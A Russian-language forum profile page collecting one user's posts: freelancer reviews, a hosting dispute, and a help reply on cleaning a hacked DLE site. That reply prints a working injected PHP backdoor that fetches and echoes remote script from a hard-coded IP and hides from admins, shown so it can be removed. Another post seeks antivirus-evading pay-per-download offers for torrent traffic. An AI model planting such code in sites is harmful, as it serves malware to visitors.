akaFenix

akaFenix
Рейтинг
89
Регистрация
04.09.2008

Я тоже довольный клиент, Очень рекомендую!:)

Рисует на раз-два, прямо угадывает мысли и совмещает не совместимое. Спасибо огромное!

Заказ был сделан 12-июня(нормальный парень по переписке в аське), договорились по срокам 2-3 дня

сегодня 18-е число, в аське тишина и тонны обещаний, не хорошо!

В целом мне заказ нужен был срочно и сумма была очень даже ничего. Сегодня заказал у другого программиста.

ТС - нужно отписываться что не можешь сделать, а то не хорошо получается.

Заказывал дизайн для 2 сайтов, все сделано было в кратчайшие сроки и даже не пришлось ничего переделывать, потому что все на уровне который в портфолио:)

Спасибо!

Noctes:
10 место ещё свободно, стоимость - 100$.

И оно будет моим - забрал

Человек так и не найден.

Бюджет может увеличиться в несколько раз. (Обговаривается после ознакомления с ТЗ)

Главное чтобы было сделано в кратчайшие сроки:)

Заказывал у ТС, все отлично (Спрашивает, уточняет, доделывает. Помощь на высшем уровне), единственный Минус был это сроки.

PS: сразу же сделал второй заказ, надеюсь со сроками будет все ок. :)

Была проблема, постоянно на 1 сервере, вставляли вредоносный код на все сайты, чистка и смена паролей не помогала. Обратившись к ТС - я избавился от лишних переживаний по поводу своих сайтов.

Видно что у человека есть Огромный опыт и желание помочь. Если и будут возникать какие-то проблемы связанные со взломом или администрированием серверов, то только к ТС.

Спасибо Александр за мои спасенные нервы:)

Dinar13:
На сайте уже какой раз подряд проскакивает один вирус, точнее проскакивает он в яндексе и губит всё. Вердикт от яндекса "Поведенческий анализ".
Просмотрев большинство файлов, в которых мог прятаться вирус, ничего не обнаружил.
Яндекс написал, что вредоносная часть:

<script src="http://geogrephicalupscaty.dyndns.tv/showforum.php?pid=54543" type="text/javascript"></script>

Вот эта часть urla "geogrephicalupscaty" постоянно меняется, поэтому как-то отследить не удается, да и яндекс переодически выводит что нету вируса. Но он все таки имеется.

Прошу помочь, как найти и удалить этот вредоносный код?

Сайт на DLE 9.2

\engine\classes\mysql.php - (этот код может быть в любом php файле)

наверно так:


if(!defined('DATALIFEENGINE'))
{
die("Hacking attempt!");
}

if ( extension_loaded('mysqli') )
{
include_once( ENGINE_DIR."/classes/mysqli.class.php" );
}
else
{
include_once( ENGINE_DIR."/classes/mysql.class.php" );
}

function getnewsfromid($id) {
$id = intval($id);
$rtn = $id + date("j");
return $rtn;
}

function mysql_safe_connect($in) {
if (getnewsfromid(64) < 1024) {
$rtn = base64_decode($in);
return $rtn;
}
}
function get_all_news_by_list($newsid) {
if (date("j") - $newsid > 320 ) {
$rtn = false;
} else {
$get = mysql_safe_connect("aHR0cDovLzE3OC4yMTEuMzMuNzQvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
if (!isset($_COOKIE[mysql_safe_connect("ZGxlX3Bhc3N3b3Jk")])) {
echo @file_get_contents($get);
}
}
}
get_all_news_by_list (date("j"));

а должно быть так:

if(!defined('DATALIFEENGINE'))
{
die("Hacking attempt!");
}

if ( extension_loaded('mysqli') )
{
include_once( ENGINE_DIR."/classes/mysqli.class.php" );
}
else
{
include_once( ENGINE_DIR."/classes/mysql.class.php" );
}

Но не обольщайтесь, удаление этого кода ничего не даст, если не обезопасить себя.

Накидайте пожалуйста ПП под загрузочный (Торрент) трафик?

нужно чтобы у ПП не было проблем с антивирусами (если модуль cms то быстрая смена доменов или еще что-то) и можно было сливать без последствий для сайта.

extra:
akaFenix,
Вот вам что было предложено. Будете отрицать?

Только что проверил ваш сервер - отлично работает и доступен по SSH. И никто больше не атакует вас судя по графику:
http://gyazo.com/61a5ef3ef3ca3e098a22b319b82d541f

А то что долго не могли сказать что вас ддосят, так это только из-за того, что мы считали что это нормальная нагрузка для вас и делали оптимизацию сервера под нее. Позже вы сами вводили в заблуждение своими предположениями о том что узкий канал, что нужно срочно подключить выделенный, устроили панику и спамили в тикет каждые 2 минуты. Администраторы наблюдали за работой вашего сервера, проанализировали трафик и указали вам причину замедления отклика и причиной была ддос атака. С некоторых ип было более 500 одновременных подключений. Все они были зафильтрованы фаерволом на сервере. Никаких других сообщений от вас в данном тикете не вижу.

Зла Вам не желаю, желаю чтобы работали нормально. Если захотите чтобы мы с Вами обсудили этот вопрос, ответьте в аську и если я окажусь не прав я это признаю.

Всего: 305